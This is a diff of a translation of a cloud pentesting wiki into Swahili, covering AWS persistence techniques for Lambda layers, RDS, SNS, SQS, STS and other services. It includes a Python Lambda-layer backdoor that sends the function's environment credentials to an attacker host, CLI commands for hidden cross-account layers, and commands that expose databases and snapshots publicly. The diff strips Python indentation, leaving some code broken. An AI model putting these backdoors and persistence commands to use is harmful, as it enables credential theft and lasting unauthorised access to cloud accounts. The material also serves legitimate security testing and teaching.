+Chombo [**lambda-spy**](https://github.com/clearvector/lambda-spy) kilitengenezwa ili kutekeleza **memory write** na **kuchukua taarifa nyeti** kutoka kwa maombi ya lambda, maombi mengine ya **extensions** na hata **kuyabadilisha**.
## References
@@ -40,7 +40,3 @@ The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created
- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
index f8a5e2868..f5de397fd 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -4,22 +4,20 @@
## Lambda Layers
-A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+Layer ya Lambda ni archive ya .zip ambayo **inaweza kuwa na msimbo wa ziada** au maudhui mengine. Layer inaweza kuwa na maktaba, [runtime ya kawaida](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, au faili za usanidi.
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+Inawezekana kujumuisha hadi **layers tano kwa kazi**. Unapojumuisha layer katika kazi, **maudhui yanachukuliwa hadi kwenye saraka ya `/opt`** katika mazingira ya utekelezaji.
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+Kwa **default**, **layers** ambazo unaunda ni **binafsi** kwa akaunti yako ya AWS. Unaweza kuchagua **kushiriki** layer na akaunti nyingine au **kufanya** layer hiyo **kuwa ya umma**. Ikiwa kazi zako zinatumia layer ambayo akaunti tofauti ilichapisha, kazi zako zinaweza **kuendelea kutumia toleo la layer baada ya kufutwa, au baada ya ruhusa yako ya kufikia layer hiyo kufutwa**. Hata hivyo, huwezi kuunda kazi mpya au kuboresha kazi ukitumia toleo la layer lililofutwa.
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+Kazi zilizowekwa kama picha ya kontena hazitumii layers. Badala yake, unapakua runtime unayopendelea, maktaba, na utegemezi mwingine ndani ya picha ya kontena unapojenga picha hiyo.
### Python load path
-The load path that Python will use in lambda is the following:
-
+Njia ya kupakia ambayo Python itatumia katika lambda ni ifuatayo:
```
['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
```
-
Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
> [!CAUTION]
@@ -37,46 +35,41 @@ Therefore, the requisites are:
> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
-
```python
import sys
def lambda_handler(event, context):
- return {
- 'statusCode': 200,
- 'body': str(sys.modules.keys())
- }
+return {
+'statusCode': 200,
+'body': str(sys.modules.keys())
+}
```
-
-And this is the **list** (check that libraries like `os` or `json` are already there)
-
+Na hii ni **orodha** (hakikisha kwamba maktaba kama `os` au `json` tayari zipo)
```
'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
```
-
-And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+Na hii ni orodha ya **maktaba** ambazo **lambda inajumuisha zilizowekwa kwa chaguo-msingi**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
### Lambda Layer Backdooring
-In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
+Katika mfano huu hebu tuweke kuwa msimbo unaolengwa unatumia **`csv`**. Tunakwenda **kufanya backdoor kwenye uagizaji wa maktaba ya `csv`**.
-For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
-Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
-This file must:
+Ili kufanya hivyo, tutaunda **directory csv** yenye faili **`__init__.py`** ndani yake katika njia ambayo inapakuliwa na lambda: **`/opt/python/lib/python3.9/site-packages`**\
+Kisha, wakati lambda inatekelezwa na kujaribu kupakua **csv**, faili yetu ya **`__init__.py` itapakuliwa na kutekelezwa**.\
+Faili hii lazima:
-- Execute our payload
-- Load the original csv library
-
-We can do both with:
+- Itekeleze payload yetu
+- Ipakue maktaba ya csv asilia
+Tunaweza kufanya yote mawili kwa:
```python
import sys
from urllib import request
with open("/proc/self/environ", "rb") as file:
- url= "https://attacker13123344.com/" #Change this to your server
- req = request.Request(url, data=file.read(), method="POST")
- response = request.urlopen(req)
+url= "https://attacker13123344.com/" #Change this to your server
+req = request.Request(url, data=file.read(), method="POST")
+response = request.urlopen(req)
# Remove backdoor directory from path to load original library
del_path_dir = "/".join(__file__.split("/")[:-2])
@@ -90,29 +83,27 @@ import csv as _csv
sys.modules["csv"] = _csv
```
+Kisha, tengeneza zip na msimbo huu katika njia **`python/lib/python3.9/site-packages/__init__.py`** na uongeze kama tabaka la lambda.
-Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
+Unaweza kupata msimbo huu katika [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-
-The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
+Payload iliyounganishwa it **tuma IAM creds kwa seva WAKATI WA KWANZA inapoitwa au BAADA ya kurekebisha kontena la lambda** (mabadiliko ya msimbo au lambda baridi), lakini **mbinu nyingine** kama ifuatavyo zinaweza pia kuunganishwa:
{{#ref}}
../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
{{#endref}}
-### External Layers
+### Tabaka za Nje
-Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
-Also note that the **max number of layers a lambda can have is 5**.
+Kumbuka kwamba inawezekana kutumia **tabaka za lambda kutoka kwa akaunti za nje**. Aidha, lambda inaweza kutumia tabaka kutoka kwa akaunti ya nje hata kama haina ruhusa.\
+Pia kumbuka kwamba **idadi ya juu ya tabaka ambayo lambda inaweza kuwa nayo ni 5**.
-Therefore, in order to improve the versatility of this technique an attacker could:
-
-- Backdoor an existing layer of the user (nothing is external)
-- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
- - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
- - The victim **won't see external layers** used with **`aws lambda list-layers`**
+Hivyo, ili kuboresha ufanisi wa mbinu hii mshambuliaji anaweza:
+- Kuingiza nyuma tabaka lililopo la mtumiaji (hakuna chochote ni cha nje)
+- **Kuunda** **tabaka** katika **akaunti yake**, kumpa **mtumiaji waathirika ruhusa** kutumia tabaka, **kuweka** **tabaka** katika Lambda ya waathirika na **kuondoa ruhusa**.
+- **Lambda** bado itakuwa na uwezo wa **kutumia tabaka** na **waathirika hawata** kuwa na njia rahisi ya **kupakua msimbo wa tabaka** (kando na kupata rev shell ndani ya lambda)
+- Waathirika **hawataona tabaka za nje** zinazotumika na **`aws lambda list-layers`**
```bash
# Upload backdoor layer
aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
@@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
# Remove permissions
aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
```
-
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
index 88b0d082a..cb38c8483 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -4,34 +4,30 @@
## Lightsail
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-lightsail-enum.md
{{#endref}}
-### Download Instance SSH keys & DB passwords
+### Pakua Funguo za SSH za Instance & Nywila za DB
-They won't be changed probably so just having them is a good option for persistence
+Hawatabadilishwa labda hivyo kuwa nazo ni chaguo nzuri kwa ajili ya kudumu
### Backdoor Instances
-An attacker could get access to the instances and backdoor them:
+Mshambuliaji anaweza kupata ufikiaji wa instances na kuziingiza backdoor:
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key**
-- Expose a port with port knocking with a backdoor
+- Kutumia **rootkit** wa jadi kwa mfano
+- Kuongeza **funguo mpya za SSH za umma**
+- Kufichua bandari kwa kutumia port knocking na backdoor
### DNS persistence
-If domains are configured:
+Ikiwa majina ya kikoa yamewekwa:
-- Create a subdomain pointing your IP so you will have a **subdomain takeover**
-- Create **SPF** record allowing you to send **emails** from the domain
-- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
+- Unda subdomain inayolenga IP yako ili uwe na **subdomain takeover**
+- Unda rekodi ya **SPF** inayokuruhusu kutuma **barua pepe** kutoka kwa kikoa
+- Sanidi **IP ya kikoa kikuu kuwa yako mwenyewe** na fanya **MitM** kutoka IP yako hadi zile halali
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
index b7a4b8f7b..2a3490e7f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -4,32 +4,24 @@
## RDS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-relational-database-rds-enum.md
{{#endref}}
-### Make instance publicly accessible: `rds:ModifyDBInstance`
-
-An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+### Fanya mfano uweze kupatikana hadharani: `rds:ModifyDBInstance`
+Mshambuliaji mwenye ruhusa hii anaweza **kubadilisha mfano wa RDS uliopo ili kuwezesha upatikanaji wa hadhara**.
```bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
```
-
### Create an admin user inside the DB
-An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
+Mshambuliaji anaweza tu **kuunda mtumiaji ndani ya DB** hivyo hata kama nenosiri la mtumiaji mkuu limebadilishwa **hampotezi ufikiaji** wa hifadhidata.
### Make snapshot public
-
```bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
index f2c4ce048..babd43c0f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -4,7 +4,7 @@
## S3
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-s3-athena-and-glacier-enum.md
@@ -12,18 +12,14 @@ For more information check:
### KMS Client-Side Encryption
-When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+Wakati mchakato wa usimbaji unakamilika, mtumiaji atatumia KMS API kutengeneza funguo mpya (`aws kms generate-data-key`) na at **hifadhi funguo iliyosimbwa iliyotengenezwa ndani ya metadata** ya faili ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) ili wakati usimbuaji unapotokea, inaweza kusimbua tena kwa kutumia KMS:
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+Hivyo, mshambuliaji anaweza kupata funguo hii kutoka kwenye metadata na kusimbua kwa KMS (`aws kms decrypt`) ili kupata funguo iliyotumika kusimbua taarifa. Kwa njia hii, mshambuliaji atakuwa na funguo ya usimbaji na ikiwa funguo hiyo itatumika tena kusimbua faili nyingine, ataweza kuitumia.
### Using S3 ACLs
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+Ingawa kawaida ACLs za ndoo zimezimwa, mshambuliaji mwenye ruhusa za kutosha anaweza kuzitumia vibaya (ikiwa zimewezeshwa au ikiwa mshambuliaji anaweza kuzihamisha) ili kuendelea kupata ufikiaji wa ndoo ya S3.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
index c15f27003..cbc87c93e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
@@ -1,57 +1,51 @@
-# AWS - Secrets Manager Persistence
+# AWS - Usimamizi wa Siri
{{#include ../../../banners/hacktricks-training.md}}
-## Secrets Manager
+## Usimamizi wa Siri
-For more info check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-secrets-manager-enum.md
{{#endref}}
-### Via Resource Policies
+### Kupitia Sera za Rasilimali
-It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
+Inawezekana **kutoa ufikiaji wa siri kwa akaunti za nje** kupitia sera za rasilimali. Angalia [**ukurasa wa Privesc wa Usimamizi wa Siri**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) kwa maelezo zaidi. Kumbuka kwamba ili **kufikia siri**, akaunti ya nje pia itahitaji **ufikiaji wa funguo za KMS zinazoficha siri**.
-### Via Secrets Rotate Lambda
+### Kupitia Lambda ya Kugeuza Siri
-To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
-
-This is how lambda code for such action could look like:
+Ili **kugeuza siri** kiotomatiki, **Lambda** iliyowekwa inaitwa. Ikiwa mshambuliaji angeweza **kubadilisha** **kanuni** angeweza moja kwa moja **kuhamasisha siri mpya** kwake mwenyewe.
+Hii ndiyo jinsi kanuni ya lambda kwa hatua kama hiyo inaweza kuonekana:
```python
import boto3
def rotate_secrets(event, context):
- # Create a Secrets Manager client
- client = boto3.client('secretsmanager')
+# Create a Secrets Manager client
+client = boto3.client('secretsmanager')
- # Retrieve the current secret value
- secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
+# Retrieve the current secret value
+secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
- # Rotate the secret by updating its value
- new_secret_value = rotate_secret(secret_value)
- client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
+# Rotate the secret by updating its value
+new_secret_value = rotate_secret(secret_value)
+client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
def rotate_secret(secret_value):
- # Perform the rotation logic here, e.g., generate a new password
+# Perform the rotation logic here, e.g., generate a new password
- # Example: Generate a new password
- new_secret_value = generate_password()
+# Example: Generate a new password
+new_secret_value = generate_password()
- return new_secret_value
+return new_secret_value
def generate_password():
- # Example: Generate a random password using the secrets module
- import secrets
- import string
- password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
- return password
+# Example: Generate a random password using the secrets module
+import secrets
+import string
+password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
+return password
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
index 8e97cc81c..d5e87937f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
@@ -4,7 +4,7 @@
## SNS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-sns-enum.md
@@ -12,74 +12,66 @@ For more information check:
### Persistence
-When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
-
+Unapounda **SNS topic** unahitaji kuonyesha kwa sera ya IAM **nani ana ruhusa ya kusoma na kuandika**. Inawezekana kuonyesha akaunti za nje, ARN za majukumu, au **hata "\*"**.\
+Sera ifuatayo inawapa kila mtu katika AWS ruhusa ya kusoma na kuandika katika SNS topic inayoitwa **`MySNS.fifo`**:
```json
{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__default_statement_ID",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": [
- "SNS:Publish",
- "SNS:RemovePermission",
- "SNS:SetTopicAttributes",
- "SNS:DeleteTopic",
- "SNS:ListSubscriptionsByTopic",
- "SNS:GetTopicAttributes",
- "SNS:AddPermission",
- "SNS:Subscribe"
- ],
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
- "Condition": {
- "StringEquals": {
- "AWS:SourceOwner": "318142138553"
- }
- }
- },
- {
- "Sid": "__console_pub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Publish",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- },
- {
- "Sid": "__console_sub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Subscribe",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- }
- ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__default_statement_ID",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"SNS:Publish",
+"SNS:RemovePermission",
+"SNS:SetTopicAttributes",
+"SNS:DeleteTopic",
+"SNS:ListSubscriptionsByTopic",
+"SNS:GetTopicAttributes",
+"SNS:AddPermission",
+"SNS:Subscribe"
+],
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
+"Condition": {
+"StringEquals": {
+"AWS:SourceOwner": "318142138553"
+}
+}
+},
+{
+"Sid": "__console_pub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Publish",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+},
+{
+"Sid": "__console_sub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Subscribe",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+}
+]
}
```
-
### Create Subscribers
-To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
-
-Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
+Ili kuendelea kutoa ujumbe wote kutoka kwa mada zote, mshambuliaji anaweza **kuunda wanachama kwa mada zote**.
+Kumbuka kwamba ikiwa **mada ni ya aina ya FIFO**, ni wanachama pekee wanaotumia itifaki **SQS** wanaweza kutumika.
```bash
aws sns subscribe --region \
- --protocol http \
- --notification-endpoint http:/// \
- --topic-arn
+--protocol http \
+--notification-endpoint http:/// \
+--topic-arn
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
index 88f396173..5b3cd8808 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
@@ -4,40 +4,34 @@
## SQS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-sqs-and-sns-enum.md
{{#endref}}
-### Using resource policy
-
-In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
+### Kutumia sera ya rasilimali
+Katika SQS unahitaji kuonyesha kwa sera ya IAM **nani ana ufikiaji wa kusoma na kuandika**. Inawezekana kuonyesha akaunti za nje, ARN za majukumu, au **hata "\*"**.\
+Sera ifuatayo inawapa kila mtu katika AWS ufikiaji wa kila kitu katika foleni inayoitwa **MyTestQueue**:
```json
{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__owner_statement",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": ["SQS:*"],
- "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
- }
- ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__owner_statement",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": ["SQS:*"],
+"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
+}
+]
}
```
-
> [!NOTE]
-> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
+> Unaweza hata **kuanzisha Lambda katika akaunti ya washambuliaji kila wakati ujumbe mpya** unapoingizwa kwenye foleni (utahitaji kuingiza tena) kwa njia fulani. Kwa hili fuata maelekezo haya: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
index c1b9a422b..3bd0aae28 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -1,6 +1 @@
# AWS - SSM Perssitence
-
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
index 4e8c120ff..2c13b3e37 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
@@ -4,22 +4,18 @@
## Step Functions
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-stepfunctions-enum.md
{{#endref}}
-### Step function Backdooring
+### Backdooring ya Step Function
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+Backdoor step function ili iweze kufanya ujanja wowote wa kudumu hivyo kila wakati inatekelezwa itatekeleza hatua zako za uhalifu.
-### Backdooring aliases
+### Backdooring ya majina
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+Ikiwa akaunti ya AWS inatumia majina kuita step functions, itakuwa inawezekana kubadilisha jina ili kutumia toleo jipya lililo na backdoor la step function.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
index 74db04bec..9ae86b56e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
@@ -4,62 +4,59 @@
## STS
-For more information access:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-sts-enum.md
{{#endref}}
-### Assume role token
+### Token ya kuzingatia jukumu
-Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+Token za muda mfupi haziwezi kuorodheshwa, hivyo kudumisha token ya muda mfupi iliyo hai ni njia ya kudumisha uvumilivu.
aws sts get-session-token --duration-seconds 129600
-# With MFA
+# Pamoja na MFA
aws sts get-session-token \
- --serial-number <mfa-device-name> \
- --token-code <code-from-token>
+--serial-number <mfa-device-name> \
+--token-code <code-from-token>
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# Jina la kifaa cha vifaa mara nyingi ni nambari kutoka nyuma ya kifaa, kama GAHT12345678
+# Jina la kifaa cha SMS ni ARN katika AWS, kama arn:aws:iam::123456789012:sms-mfa/username
+# Jina la kifaa cha Kijamii ni ARN katika AWS, kama arn:aws:iam::123456789012:mfa/username
-### Role Chain Juggling
+### Kucheza Mnyororo wa Jukumu
-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
-
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+[**Kucheza mnyororo wa jukumu ni kipengele kinachotambulika cha AWS**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), mara nyingi hutumiwa kudumisha uvumilivu wa siri. Inahusisha uwezo wa **kuchukua jukumu ambalo kisha linachukua jingine**, huenda ikarejea kwenye jukumu la awali kwa **njia ya mzunguko**. Kila wakati jukumu linapochukuliwa, uwanja wa muda wa kuisha wa ithibati unarefresh. Kwa hivyo, ikiwa majukumu mawili yamewekwa ili kuchukua kila mmoja, mpangilio huu unaruhusu upya wa kudumu wa ithibati.
+Unaweza kutumia [**chombo hiki**](https://github.com/hotnops/AWSRoleJuggler/) kudumisha mnyororo wa jukumu:
```bash
./aws_role_juggler.py -h
